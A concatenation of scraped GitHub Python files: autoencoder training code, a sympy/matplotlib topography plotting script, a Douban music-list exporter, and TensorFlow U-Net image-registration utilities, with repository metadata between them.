test_epoch_dc_loss_avg.result()\n losses[epoch, 5] = test_epoch_dc_acc_avg.result()\n else:\n temp_loss = np.zeros((1, 6))\n temp_loss[0, 0] = train_epoch_ae_loss_avg.result()\n temp_loss[0, 1] = train_epoch_dc_loss_avg.result()\n temp_loss[0, 2] = train_epoch_dc_acc_avg.result()\n temp_loss[0, 3] = test_epoch_ae_loss_avg.result()\n temp_loss[0, 4] = test_epoch_dc_loss_avg.result()\n temp_loss[0, 5] = test_epoch_dc_acc_avg.result()\n losses = np.concatenate((losses, temp_loss))\n\n # self.ae_optimizer.lr.assign(base_lr)\n if epoch>60 and LRonPlat==True:\n if (losses[epoch,3]-np.mean(losses[epoch-50:epoch,3]))<0:\n base_lr = base_lr*0.2\n self.ae_optimizer.lr.assign(base_lr)\n if epoch>1000 and early_stopping==True:\n if (losses[epoch,3]-np.mean(losses[epoch-50:epoch,3]))<0:\n break\n gc.collect()\n clear_session()\n compat.v1.reset_default_graph()\n self.losses = losses\n else:\n self.full_model = VSM(self.front_model,self.back_model)\n print(resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)\n print('compiling')\n self.full_model.compile(optimizer =optimizer)\n print(resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)\n print('compiled')\n self.history = self.full_model.fit(training_x,training_y, epochs=epochs, batch_size=training_x.shape[0], shuffle=True,\n validation_data=(test_x, test_y), verbose=2, callbacks=callbacks)\n elif self.type == 'Adversarial':\n base_lr = 0.00025\n if optimizer == 'Adam':\n self.ae_optimizer = tf.keras.optimizers.Adam(lr=base_lr)\n elif optimizer == 'Nadam':\n self.ae_optimizer = tf.keras.optimizers.Nadam(lr=base_lr)\n if optimizer == 'Adam':\n self.dc_optimizer = tf.keras.optimizers.Adam(lr=base_lr)\n elif optimizer == 'Nadam':\n self.dc_optimizer = tf.keras.optimizers.Nadam(lr=base_lr)\n if optimizer == 'Adam':\n self.gen_optimizer = tf.keras.optimizers.Adam(lr=base_lr)\n elif optimizer == 'Nadam':\n self.gen_optimizer = tf.keras.optimizers.Nadam(lr=base_lr)\n # Training loop\n n_epochs = epochs\n losses = np.zeros((1,8))\n base_lr = 0.00025\n max_lr = 0.00025\n n_samples = training_x.shape[0]\n step_size = 2 * np.ceil(n_samples / batch_size)\n global_step = 0\n if custom_training == True:\n for epoch in range(n_epochs):\n print(resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)\n start = time.time()\n train_epoch_ae_loss_avg = tf.metrics.Mean()\n train_epoch_dc_loss_avg = tf.metrics.Mean()\n train_epoch_dc_acc_avg = tf.metrics.Mean()\n train_epoch_gen_loss_avg = tf.metrics.Mean()\n test_epoch_ae_loss_avg = tf.metrics.Mean()\n test_epoch_dc_loss_avg = tf.metrics.Mean()\n test_epoch_dc_acc_avg = tf.metrics.Mean()\n test_epoch_gen_loss_avg = tf.metrics.Mean()\n batch_num = int(training_x.shape[0] / batch_size)\n if shuffle_data == True:\n training_x,training_y = shuffle(training_x,training_y)\n for j1 in range(batch_num):\n # -------------------------------------------------------------------------------------------------------------\n batch_x = training_x[batch_size * j1:batch_size * (j1 + 1), :]\n batch_y = training_y[batch_size * j1:batch_size * (j1 + 1), :]\n global_step = global_step + 1\n cycle = np.floor(1 + global_step / (2 * step_size))\n x_lr = np.abs(global_step / step_size - 2 * cycle + 1)\n clr = base_lr + (max_lr - base_lr) * max(0, 1 - x_lr)\n try:\n self.ae_optimizer.lr = clr\n self.dc_optimizer.lr = clr\n self.gen_optimizer.lr = clr\n except:\n None\n ae_loss, dc_loss, dc_acc, gen_loss = self.train_step_adv(batch_x, batch_y = batch_y)\n\n train_epoch_ae_loss_avg(ae_loss)\n train_epoch_dc_loss_avg(dc_loss)\n train_epoch_dc_acc_avg(dc_acc)\n 
train_epoch_gen_loss_avg(gen_loss)\n batch_num = int(test_x.shape[0] / batch_size)\n if shuffle_data == True:\n test_x,test_y = shuffle(test_x,test_y)\n for j1 in range(batch_num):\n batch_x = test_x[batch_size * j1:batch_size * (j1 + 1), :]\n batch_y = test_y[batch_size * j1:batch_size * (j1 + 1), :]\n ae_loss, dc_loss, dc_acc, gen_loss = self.train_step_adv(batch_x, batch_y=batch_y, training=False)\n\n test_epoch_ae_loss_avg(ae_loss)\n test_epoch_dc_loss_avg(dc_loss)\n test_epoch_dc_acc_avg(dc_acc)\n test_epoch_gen_loss_avg(gen_loss)\n epoch_time = time.time() - start\n print('{:4d}: TIME: {:.2f} ETA: {:.2f} AE_TRAIN_LOSS: {:.4f} DC_TRAIN_LOSS: {:.4f} GEN_TRAIN_LOSS: {:.4f} AE_TEST_LOSS: {:.4f} DC_TEST_LOSS: {:.4f} GEN_TEST_LOSS: {:.4f}' \\\n .format(epoch, epoch_time,\n epoch_time * (n_epochs - epoch),\n train_epoch_ae_loss_avg.result(),\n train_epoch_dc_loss_avg.result(),\n train_epoch_gen_loss_avg.result(),\n test_epoch_ae_loss_avg.result(),\n test_epoch_dc_loss_avg.result(),\n test_epoch_gen_loss_avg.result()))\n if epoch == 0:\n losses[epoch, 0] = train_epoch_ae_loss_avg.result()\n losses[epoch, 1] = train_epoch_dc_loss_avg.result()\n losses[epoch, 2] = train_epoch_dc_acc_avg.result()\n losses[epoch, 3] = train_epoch_gen_loss_avg.result()\n losses[epoch, 4] = test_epoch_ae_loss_avg.result()\n losses[epoch, 5] = test_epoch_dc_loss_avg.result()\n losses[epoch, 6] = test_epoch_dc_acc_avg.result()\n losses[epoch, 7] = test_epoch_gen_loss_avg.result()\n else:\n temp_loss = np.zeros((1,8))\n temp_loss[0, 0] = train_epoch_ae_loss_avg.result()\n temp_loss[0, 1] = train_epoch_dc_loss_avg.result()\n temp_loss[0, 2] = train_epoch_dc_acc_avg.result()\n temp_loss[0, 3] = train_epoch_gen_loss_avg.result()\n temp_loss[0, 4] = test_epoch_ae_loss_avg.result()\n temp_loss[0, 5] = test_epoch_dc_loss_avg.result()\n temp_loss[0, 6] = test_epoch_dc_acc_avg.result()\n temp_loss[0, 7] = test_epoch_gen_loss_avg.result()\n losses = np.concatenate((losses,temp_loss))\n if epoch > 20 and LRonPlat==True:\n if (losses[epoch, 4] - np.mean(losses[epoch - 20:epoch, 4])) < 0:\n base_lr = base_lr * 0.2\n self.ae_optimizer.lr.assign(base_lr)\n self.gen_optimizer.lr.assign(base_lr)\n self.dc_optimizer.lr.assign(base_lr)\n if epoch > 1000 and early_stopping == True:\n if (losses[epoch, 4] - np.mean(losses[epoch - 50:epoch, 4])) < 0:\n break\n gc.collect()\n clear_session()\n compat.v1.reset_default_graph()\n self.losses = losses\n else:\n losses = np.zeros((1, 6))\n self.disc.compile(loss='binary_crossentropy',optimizer = self.dc_optimizer)\n self.disc.trainable=False\n Adv_input = Input(shape=(self.input_size))\n encoded_output=self.front_model(Adv_input)\n decoder_output=self.back_model(encoded_output)\n valdity = self.disc(encoded_output)\n adv_net = Model(Adv_input,[decoder_output,valdity],name='Adv_net')\n adv_net.compile(loss=['mse', 'binary_crossentropy'], loss_weights=[0.999, 0.01], optimizer=self.ae_optimizer)\n for epoch in range(n_epochs):\n start = time.time()\n\n batch_num = int(training_x.shape[0] / batch_size)\n if shuffle_data == True:\n training_x, training_y = shuffle(training_x, training_y)\n for j1 in range(batch_num):\n batch_x = training_x[batch_size * j1:batch_size * (j1 + 1), :]\n batch_y = training_y[batch_size * j1:batch_size * (j1 + 1), :]\n real_distribution = tf.random.normal([batch_x.shape[0], self.nlatent], mean=0.0, stddev=1.0)\n real = np.ones(batch_x.shape[0])\n fake = np.zeros(batch_x.shape[0])\n latent_fake = self.front_model.predict(batch_x)\n g_train_loss = 
adv_net.train_on_batch(batch_x, [batch_y, real])\n print('done')\n print(str(g_train_loss))\n batch_num = int(test_x.shape[0] / batch_size)\n if shuffle_data == True:\n test_x, test_y = shuffle(test_x, test_y)\n for j1 in range(batch_num):\n batch_x = test_x[batch_size * j1:batch_size * (j1 + 1), :]\n batch_y = test_y[batch_size * j1:batch_size * (j1 + 1), :]\n g_test_loss = adv_net.test_on_batch(batch_x, [batch_y, real])\n if epoch == 0:\n losses[epoch,:3] = g_train_loss[:]\n losses[epoch, 3:] = g_test_loss[:]\n\n else:\n temp_loss = np.zeros((1, 6))\n temp_loss[0,:3] = g_train_loss[:]\n temp_loss[0, 3:] = g_test_loss[:]\n losses = np.concatenate((losses, temp_loss))\n gc.collect()\n clear_session()\n compat.v1.reset_default_graph()\n self.losses=losses\n\n\n else:\n if custom_training==True:\n base_lr = 0.00025\n if optimizer == 'Adam':\n self.ae_optimizer = tf.keras.optimizers.Adam(lr=base_lr)\n elif optimizer == 'Nadam':\n self.ae_optimizer = tf.keras.optimizers.Nadam(lr=base_lr)\n # Training loop\n n_epochs = epochs\n losses = np.zeros((1, 2))\n max_lr = 0.00025\n n_samples = training_x.shape[0]\n step_size = 2 * np.ceil(n_samples / batch_size)\n global_step = 0\n for epoch in range(n_epochs):\n print(resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)\n start = time.time()\n train_epoch_ae_loss_avg = tf.metrics.Mean()\n test_epoch_ae_loss_avg = tf.metrics.Mean()\n batch_num = int(training_x.shape[0] / batch_size)\n if shuffle_data == True:\n training_x,training_y = shuffle(training_x,training_y)\n for j1 in range(batch_num):\n # -------------------------------------------------------------------------------------------------------------\n batch_x = training_x[batch_size * j1:batch_size * (j1 + 1), :]\n batch_y = training_y[batch_size * j1:batch_size * (j1 + 1), :]\n global_step = global_step + 1\n cycle = np.floor(1 + global_step / (2 * step_size))\n x_lr = np.abs(global_step / step_size - 2 * cycle + 1)\n clr = base_lr + (max_lr - base_lr) * max(0, 1 - x_lr)\n try:\n self.ae_optimizer.lr = clr\n\n except:\n None\n ae_loss = self.train_step_norm(batch_x, batch_y=batch_y)\n\n train_epoch_ae_loss_avg(ae_loss)\n batch_num = int(test_x.shape[0] / batch_size)\n if shuffle_data == True:\n test_x,test_y = shuffle(test_x,test_y)\n for j1 in range(batch_num):\n # -------------------------------------------------------------------------------------------------------------\n batch_x = test_x[batch_size * j1:batch_size * (j1 + 1), :]\n batch_y = test_y[batch_size * j1:batch_size * (j1 + 1), :]\n ae_loss = self.train_step_norm(batch_x, batch_y=batch_y, training=False)\n\n test_epoch_ae_loss_avg(ae_loss)\n epoch_time = time.time() - start\n print('{:4d}: TIME: {:.2f} ETA: {:.2f} MSE_TRAIN_LOSS: {:.4f} MSE_TEST_LOSS: {:.4f}' \\\n .format(epoch, epoch_time,\n epoch_time * (n_epochs - epoch),\n train_epoch_ae_loss_avg.result(),\n test_epoch_ae_loss_avg.result()))\n if epoch == 0:\n losses[epoch, 0] = train_epoch_ae_loss_avg.result()\n losses[epoch, 1] = test_epoch_ae_loss_avg.result()\n else:\n temp_loss = np.zeros((1, 2))\n temp_loss[0, 0] = train_epoch_ae_loss_avg.result()\n temp_loss[0, 1] = test_epoch_ae_loss_avg.result()\n losses = np.concatenate((losses, temp_loss))\n if epoch > 60 and LRonPlat==True:\n if (losses[epoch, 0] - np.mean(losses[epoch - 50:epoch, 0])) > 0:\n base_lr = base_lr * 0.2\n self.ae_optimizer.lr.assign(base_lr)\n if epoch > 500 and early_stopping == True:\n if (losses[epoch, 1] - np.mean(losses[epoch - 50:epoch, 1])) > 0:\n break\n gc.collect()\n clear_session()\n 
compat.v1.reset_default_graph()\n                self.losses = losses\n        else:\n            self.full_model.compile(optimizer, loss)\n            self.history = self.full_model.fit(training_x,training_y, epochs=epochs, batch_size=batch_size, shuffle=True,\n                                               validation_data=(test_x, test_y), verbose=2, callbacks=callbacks)\n\n        try:\n            plt.yscale('log')\n            plt.plot(self.history.history['loss'])\n            plt.plot(self.history.history['val_loss'])\n            plt.savefig(save_location + 'losses.png')\n        except:\n            try:\n                plt.yscale('log')\n                if self.type=='Adversarial':\n                    plt.plot(self.losses[:, 0])\n                    plt.plot(self.losses[:, 4])\n                elif self.type=='Variational':\n                    plt.plot(self.losses[:, 0])\n                    plt.plot(self.losses[:, 3])\n                else:\n                    plt.plot(self.losses[:, 0])\n                    plt.plot(self.losses[:, 1])\n                plt.savefig(save_location + 'losses.png')\n            except:\n                print('could not plot losses')\n\n        if save_full_model == True:\n            try:\n                self.full_model.save(save_location + 'full.h5')\n            except:\n                print('could not save full model')\n            if (self.real_layer == 'Adversarial') or (self.real_layer == 'Variational'):\n                self.front_model.save(save_location + 'front.h5')\n                self.back_model.save(save_location + 'back.h5')\n        else:\n            if (self.real_layer == 'Adversarial') or (self.real_layer == 'Variational'):\n                self.front_model.save_weights(save_location + 'front.h5')\n                self.back_model.save_weights(save_location + 'back.h5')\n            try:\n                self.full_model.save_weights(save_location + 'full.h5')\n            except:\n                print('could not save full model')\n    #loads a previously trained model; if load_full_model = False, loads just the weights (create_architecture must have been called first)\n    def load_model(self,load_full_model=True,save_location='model'):\n        if load_full_model == True:\n            try:\n                if self.real_layer == 'Adversarial':\n                    self.front_model = tf.keras.models.load_model(save_location + 'front.h5')\n                    self.back_model = tf.keras.models.load_model(save_location + 'back.h5')\n                    Adv_input = Input(shape=(self.input_size))\n                    encoder_outputs = self.front_model(Adv_input)\n                    decoder_outputs = self.back_model(encoder_outputs)\n                    self.full_model = Model(Adv_input, decoder_outputs)\n                elif self.real_layer == 'Variational':\n                    self.full_model = tf.keras.models.load_model(save_location + '.h5')\n            except:\n                self.full_model = tf.keras.models.load_model(save_location + 'full.h5')\n        elif load_full_model == False:\n            if self.real_layer == 'Adversarial':\n                # self.full_model.load_weights(save_location + '.h5')\n                self.front_model.load_weights(save_location + 'front.h5', by_name = True)\n                self.back_model.load_weights(save_location + 'back.h5', by_name = True)\n                Adv_input = Input(shape=(self.input_size))\n                encoder_outputs = self.front_model(Adv_input)\n                decoder_outputs = self.back_model(encoder_outputs)\n                self.full_model = Model(Adv_input, decoder_outputs)\n            elif self.real_layer == 'Variational':\n                self.front_model.load_weights(save_location + 'front.h5')\n                self.back_model.load_weights(save_location + 'back.h5')\n                Adv_input = Input(shape=(self.input_size))\n                encoder_outputs = self.front_model(Adv_input)[2]\n                decoder_outputs = self.back_model(encoder_outputs)\n                self.full_model = Model(Adv_input, decoder_outputs)\n            else:\n                self.full_model.load_weights(save_location + 'full.h5')\n                # self.full_model.load_weights(save_location + '.h5')\n\n#Alternative Variational class for training\nclass VSM(tf.keras.Model):\n    def __init__(self, encoder, decoder, **kwargs):\n        super(VSM, self).__init__(**kwargs)\n        self.encoder = encoder\n        self.decoder = decoder\n        self.total_loss_tracker = tf.keras.metrics.Mean(name=\"total_loss\")\n        self.reconstruction_loss_tracker = tf.keras.metrics.Mean(\n            name=\"reconstruction_loss\"\n        )\n        self.kl_loss_tracker = tf.keras.metrics.Mean(name=\"kl_loss\")\n\n    @property\n    def metrics(self):\n        return [\n            self.total_loss_tracker,\n            self.reconstruction_loss_tracker,\n            self.kl_loss_tracker,\n        ]\n    def call(self, x):\n        pass\n    def train_step(self, data):\n        x, y = data\n        with tf.GradientTape() as tape:\n            z_mean, z_log_var, z = self.encoder(x)\n            reconstruction = self.decoder(z)\n            reconstruction = K.flatten(reconstruction)\n            y_flatten = K.flatten(y)\n            reconstruction_loss = mse(y_flatten, reconstruction)\n            kl_loss = -5e-4 * K.mean(1 + z_log_var - K.square(z_mean) - K.exp(z_log_var), axis=-1)\n            total_loss = K.mean(reconstruction_loss + kl_loss)\n        grads = tape.gradient(total_loss, self.trainable_weights)\n        self.optimizer.apply_gradients(zip(grads, self.trainable_weights))\n        self.total_loss_tracker.update_state(total_loss)\n        self.reconstruction_loss_tracker.update_state(reconstruction_loss)\n        self.kl_loss_tracker.update_state(kl_loss)\n        gc.collect()\n        # clear_session()\n        return {\n            \"loss\": self.total_loss_tracker.result(),\n            \"reconstruction_loss\": self.reconstruction_loss_tracker.result(),\n            \"kl_loss\": self.kl_loss_tracker.result(),\n        }\n    def test_step(self, data):\n        x, y = data\n        with tf.GradientTape() as tape:\n            z_mean, z_log_var, z = self.encoder(x, training=False)\n            reconstruction = self.decoder(z, training=False)\n            reconstruction = K.flatten(reconstruction)\n            y_flatten = K.flatten(y)\n            reconstruction_loss = mse(y_flatten, reconstruction)\n            kl_loss = -5e-4 * K.mean(1 + z_log_var - K.square(z_mean) - K.exp(z_log_var), axis=-1)\n            total_loss = K.mean(reconstruction_loss + kl_loss)\n        # grads = tape.gradient(total_loss, self.trainable_weights)\n        # self.optimizer.apply_gradients(zip(grads, self.trainable_weights))\n        self.total_loss_tracker.update_state(total_loss)\n        self.reconstruction_loss_tracker.update_state(reconstruction_loss)\n        self.kl_loss_tracker.update_state(kl_loss)\n        return {\n            \"loss\": self.total_loss_tracker.result(),\n            \"reconstruction_loss\": self.reconstruction_loss_tracker.result(),\n            \"kl_loss\": self.kl_loss_tracker.result(),\n        }\n\n","repo_name":"edsml-sz1222/test","sub_path":"surrogate_model.py","file_name":"surrogate_model.py","file_ext":"py","file_size_in_byte":48781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"6572526398","text":"import numpy as np\r\nfrom mpmath import *\r\nfrom sympy import * \r\nfrom sympy import E, Eq, Function, pde_separate, Derivative as D, Q\r\nfrom sympy.vector import CoordSys3D\r\nfrom sympy.vector import CoordSys3D,matrix_to_vector,curl,gradient,divergence,Del,Divergence,Gradient, laplacian,Curl\r\nimport matplotlib.pyplot as plt\r\nfrom sympy.parsing.sympy_parser import parse_expr\r\n\r\n\r\nC = CoordSys3D('C')\r\ninit_printing()\r\nU0,omega,qRe,chi,qRo,BOx,qAl,BOz,qRm,qFr,Ri,zeta,Dist,e = symbols(\"U0,omega,qRe,chi,qRo,BOx,qAl,BOz,qRm,qFr,Ri,zeta,Dist,e\")\r\nx = C.x\r\ny = C.y\r\nz = C.z\r\n\r\n\r\nfil = open(\"./sol_topo\",\"r\")\r\nfi = fil.read()\r\nfil.close()\r\nind = fi.find(\"Matrix\")\r\nMat = fi[ind:]\r\nexec(\"solfull =\" + Mat)\r\ndic = fi[:ind]\r\nexec(\"dic =\" + dic)\r\nzet = float(dic[zeta])\r\nprint(dic)\r\n\r\n\r\nff = lambdify([x,z],solfull.xreplace({y:0}),'numpy')\r\nxn = np.linspace(-2*np.pi,2*np.pi,200)\r\nyn = np.linspace(0,-1,200)\r\nxqui = xn[::6]\r\nyqui = yn[::6]\r\nXqui,Yqui = np.meshgrid(xqui,yqui)\r\nX,Y = np.meshgrid(xn,yn)\r\n\r\ndisp = 0\r\nprint(ff(2,0))\r\nvar =
[\"ux\",\"uy\",\"uz\",\"p\",\"bx\",\"by\",\"bz\"]\nplt.figure(figsize=(15,8))\nplt.plot(xn,np.real(zet*np.exp(1j*xn)),'k')\n#plt.plot(xn,np.real(zet*np.exp(1j*xn))-1,'k')\nplt.contourf(X,Y,np.real(ff(X,Y))[disp][0],200,cmap = \"viridis\",zorder=1)\nplt.colorbar()\n#plt.streamplot(X,Y,np.real(ff(X,Y)[0][0]),np.real(ff(X,Y)[2][0]),color = \"k\",linewidth = 0.5, density = 4,arrowsize = 0.5,maxlength = 6)\nplt.quiver(Xqui,Yqui,np.real(ff(Xqui,Yqui)[0][0]),np.real(ff(Xqui,Yqui)[2][0]),zorder=2)\nplt.show()\n","repo_name":"monvilre/ToCCo","sub_path":"topo_plot_example.py","file_name":"topo_plot_example.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1500582349","text":"import sys\nimport requests\nimport os\nfrom typing import List\n\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\nimport xlwings as xw\nimport xlsxwriter\n\nfrom douban_exporter_lite.douban_exporter import DoubanExporter\nfrom douban_exporter_lite.misc import HEADERS\n\n\nclass MusicSheet(DoubanExporter):\n def __init__(self, user_id):\n super().__init__(user_id)\n self.category = \"music\"\n self.file_name = (\n f\"{self.user_id}_{self.category}_{datetime.now().strftime('%Y-%m-%d')}.xlsx\"\n )\n\n def initial_sheet(self, sheet_type, workbook, global_format, heading_format):\n sheet = workbook.add_worksheet(self.map_chinese_sheet_name(sheet_type))\n\n if sheet_type == \"collect\" or sheet_type == \"do\":\n sheet.set_column(0, 1, 30, global_format)\n sheet.set_column(2, 3, 20, global_format)\n sheet.set_column(4, 4, 10, global_format)\n sheet.set_column(5, 5, 50, global_format)\n sheet.set_column(6, 6, 30, global_format)\n sheet_header = [\"专辑名\", \"表演者\", \"发行日期\", \"标记日期\", \"我的评分\", \"我的评语\", \"Tags\"]\n else:\n sheet.set_column(0, 1, 30, global_format)\n sheet.set_column(2, 3, 20, global_format)\n sheet.set_column(4, 4, 50, global_format)\n sheet.set_column(5, 5, 30, global_format)\n sheet_header = [\"专辑名\", \"表演者\", \"发行日期\", \"标记日期\", \"我的评语\", \"Tags\"]\n\n for col, item in enumerate(sheet_header):\n sheet.write(0, col, item, heading_format)\n\n def export(self, url: str) -> List[str]:\n infos = []\n info_keys = [\n \"title\",\n \"artist\",\n \"release_date\",\n \"mark_date\",\n \"rating\",\n \"comment\",\n \"tags\",\n \"douban_link\",\n ]\n r = requests.get(url, headers=HEADERS)\n soup = BeautifulSoup(r.text, \"lxml\")\n\n album_items = soup.find_all(\"div\", {\"class\": \"item\"})\n if len(album_items) > 0:\n for item in album_items:\n info_dict = dict.fromkeys(info_keys)\n # meta data\n info_dict[\"douban_link\"] = item.a[\"href\"]\n info_dict[\"title\"] = item.find(\"li\", {\"class\": \"title\"}).em.text\n try:\n info_dict[\"artist\"] = str(\n item.find(\"li\", {\"class\": \"intro\"}).text\n ).split(\" / \")[0]\n except:\n pass\n\n try:\n info_dict[\"release_date\"] = str(\n item.find(\"li\", {\"class\": \"intro\"}).text\n ).split(\" / \")[1]\n except:\n pass\n\n # user data\n # .contents[0] = .text\n info_dict[\"mark_date\"] = item.find(\"span\", {\"class\": \"date\"}).text\n\n try:\n info_dict[\"rating\"] = DoubanExporter.get_rating(\n item.find(\"span\", class_=lambda x: x != \"date\")[\"class\"][0]\n )\n except:\n pass\n\n try:\n info_dict[\"comment\"] = item.find_all(\"li\")[3].contents[0].strip()\n except IndexError:\n pass\n\n tags = item.find(\"span\", {\"class\": \"tags\"})\n if tags:\n info_dict[\"tags\"] = tags.text[3:].strip()\n\n infos.append([info_dict[key] for key in info_keys])\n 
else:\n return None\n return infos\n\n\nif __name__ == \"__main__\":\n new_task = MusicSheet(sys.argv[1])\n new_task.start_task()\n","repo_name":"IvanWoo/douban-exporter-lite","sub_path":"douban_exporter_lite/douban_music.py","file_name":"douban_music.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"3580474366","text":"# *** This code is with an Apache 2.0 license, University College London ***\n# The 2D registration network is a modified U-Net: https://www.tensorflow.org/tutorials/images/segmentation\n# Part of the network is adapted from TensorFlow Examples (https://github.com/tensorflow/examples), which needs to be installed first.\n\nimport tensorflow as tf\nfrom tensorflow_examples.models.pix2pix import pix2pix\n\n### network and layers\nclass UNet(tf.keras.Model):\n def __init__(self, out_channels, num_channels_initial):\n super(UNet, self).__init__()\n # the encoder/downsampler is a series of downsample blocks implemented in TensorFlow examples.\n self.down_stack = [\n pix2pix.downsample(num_channels_initial, 3, norm_type='instancenorm'), \n pix2pix.downsample(num_channels_initial*2, 3, norm_type='instancenorm'),\n pix2pix.downsample(num_channels_initial*4, 3, norm_type='instancenorm')\n ]\n # The decoder/upsampler is a series of upsample blocks implemented in TensorFlow examples.\n self.up_stack = [\n pix2pix.upsample(num_channels_initial*4, 3, norm_type='instancenorm'),\n pix2pix.upsample(num_channels_initial*2, 3, norm_type='instancenorm'), \n pix2pix.upsample(num_channels_initial, 3, norm_type='instancenorm'),\n ]\n self.out_layer = tf.keras.layers.Conv2DTranspose(out_channels, 3, strides=2, padding='same', activation=None, use_bias=True)\n\n def call(self, inputs):\n x = inputs\n # Downsampling through the model\n skips = []\n for down in self.down_stack[:-1]:\n x = down(x)\n skips += [x]\n x = self.down_stack[-1](x)\n # Upsampling and establishing the skip connections\n for up, skip in zip(self.up_stack, reversed(skips)):\n x = up(x)\n x = tf.concat([x, skip],axis=3) # concat = tf.keras.layers.Concatenate()\n return self.out_layer(x)\n\n def build(self, input_shape):\n inputs = tf.keras.layers.Input(shape=input_shape)\n return tf.keras.Model(inputs=inputs, outputs=self.call(inputs))\n\n\n### transformation utility functions\ndef get_reference_grid(grid_size):\n # grid_size: [batch_size, height, width]\n grid = tf.cast(tf.stack(tf.meshgrid(\n tf.range(grid_size[1]),\n tf.range(grid_size[2]),\n indexing='ij'), axis=2), dtype=tf.float32)\n return tf.tile(tf.expand_dims(grid, axis=0), [grid_size[0],1,1,1])\n\n\ndef warp_images(images, ddfs):\n # images: [batch_size, height, width]\n # ddfs: [batch_size, height, width, 2]\n reference_grid = get_reference_grid(ddfs.shape[0:3])\n warped_grids = reference_grid + ddfs\n return bilinear_resampler(images, warped_grids)\n\n\ndef bilinear_resampler(grid_data, sample_grids):\n '''\n grid_data: [batch, height, width]\n sample_grids: [batch, height, width, 2] \n '''\n batch_size, height, width = (grid_data.shape[:])\n sample_coords = tf.reshape(sample_grids, [batch_size,-1,2])\n # pad to replicate the boundaries 1-ceiling, 2-floor\n sample_coords = tf.stack([tf.clip_by_value(sample_coords[...,0],0,height-1),\n tf.clip_by_value(sample_coords[...,1],0,width-1)], axis=2)\n i1 = tf.cast(tf.math.ceil(sample_coords[...,0]), dtype=tf.int32)\n j1 = tf.cast(tf.math.ceil(sample_coords[...,1]), dtype=tf.int32)\n i0 = tf.maximum(i1-1, 0)\n j0 = 
tf.maximum(j1-1, 0)\n # four data points q_ij\n q00 = tf.gather_nd(grid_data, tf.stack([i0,j0],axis=2), batch_dims=1)\n q01 = tf.gather_nd(grid_data, tf.stack([i0,j1],axis=2), batch_dims=1)\n q11 = tf.gather_nd(grid_data, tf.stack([i1,j1],axis=2), batch_dims=1)\n q10 = tf.gather_nd(grid_data, tf.stack([i1,j0],axis=2), batch_dims=1) \n # weights with normalised local coordinates\n wi1 = sample_coords[...,0] - tf.cast(i0,dtype=tf.float32)\n wi0 = 1 - wi1\n wj1 = sample_coords[...,1] - tf.cast(j0,dtype=tf.float32)\n wj0 = 1 - wj1\n return tf.reshape(q00*wi0*wj0 + q01*wi0*wj1 + q11*wi1*wj1 + q10*wi1*wj0, [batch_size]+sample_grids.shape[1:3])\n\n\n\n'''\ndef warp_grids(grid, transform):\n # grid: [batch, height, width, 2]\n # transform: [batch, 3, 3]\n batch_size, height, width = grid.shape[0:3]\n grid = tf.concat([tf.reshape(grid,[batch_size,height*width,2]), \n tf.ones([batch_size,height*width,1])], axis=2)\n grid_warped = tf.matmul(grid, transform)\n return tf.reshape(grid_warped[...,:2], [batch_size,height,width,2])\n\n\ndef random_transform_generator(batch_size, corner_scale=.1):\n # right-multiplication affine\n ori_corners = tf.tile([[[1.,1.], [1.,-1.], [-1.,1.], [-1.,-1.]]], [batch_size,1,1])\n new_corners = ori_corners + tf.random.uniform([batch_size,4,2], -corner_scale, corner_scale) \n ori_corners = tf.concat([ori_corners,tf.ones([batch_size,4,1])], axis=2)\n new_corners = tf.concat([new_corners,tf.ones([batch_size,4,1])], axis=2)\n return tf.stack([tf.linalg.lstsq(ori_corners[n],new_corners[n]) for n in range(batch_size)], axis=0)\n\n\ndef random_image_transform(images):\n # images: [batch_size, height, width]\n reference_grid = get_reference_grid(images.shape[0:3])\n random_transform = random_transform_generator(images.shape[0], corner_scale=0.1)\n sample_grids = warp_grids(reference_grid, random_transform)\n return bilinear_resampler(images, sample_grids)\n'''\n\n### loss functions\ndef square_difference(i1, i2):\n return tf.reduce_mean(tf.square(i1 - i2), axis=[1, 2]) # use mean for normalised regulariser weighting\n\n\ndef gradient_dx(fv):\n return (fv[:, 2:, 1:-1] - fv[:, :-2, 1:-1]) / 2\n\n\ndef gradient_dy(fv):\n return (fv[:, 1:-1, 2:] - fv[:, 1:-1, :-2]) / 2\n\n\ndef gradient_txy(txy, fn):\n return tf.stack([fn(txy[..., i]) for i in [0, 1]], axis=3)\n\n\ndef gradient_norm(displacement, flag_l1=False):\n dtdx = gradient_txy(displacement, gradient_dx)\n dtdy = gradient_txy(displacement, gradient_dy)\n if flag_l1:\n norms = tf.abs(dtdx) + tf.abs(dtdy)\n else:\n norms = dtdx**2 + dtdy**2\n return tf.reduce_mean(norms, [1, 2, 3])\n\n\n'''\ndef bending_energy(displacement):\n dtdx = gradient_txy(displacement, gradient_dx)\n dtdy = gradient_txy(displacement, gradient_dy)\n dtdxx = gradient_txy(dtdx, gradient_dx)\n dtdyy = gradient_txy(dtdy, gradient_dy)\n dtdxy = gradient_txy(dtdx, gradient_dy)\n return tf.reduce_mean(dtdxx**2 + dtdyy**2 + 2*dtdxy**2, [1, 2, 3])\n\n\ndef normalised_cross_correlation(ts, ps, eps=0.0):\n dp = ps - tf.reduce_mean(ps, axis=[1, 2, 3])\n dt = ts - tf.reduce_mean(ts, axis=[1, 2, 3])\n vp = tf.reduce_sum(tf.square(dp), axis=[1, 2, 3])\n vt = tf.reduce_sum(tf.square(dt), axis=[1, 2, 3])\n return tf.constant(1.0) - tf.reduce_sum(dp*dt / (tf.sqrt(vp*vt) + eps), axis=[1, 2, 3])\n\n\ndef normalised_cross_correlation2(ts, ps, eps=1e-6):\n mean_t = tf.reduce_mean(ts, axis=[1, 2, 3])\n mean_p = tf.reduce_mean(ps, axis=[1, 2, 3])\n std_t = tf.reduce_sum(tf.sqrt(tf.square(mean_t)-tf.reduce_mean(tf.square(ts), axis=[1, 2, 3])), axis=[1, 2, 3])\n std_p = 
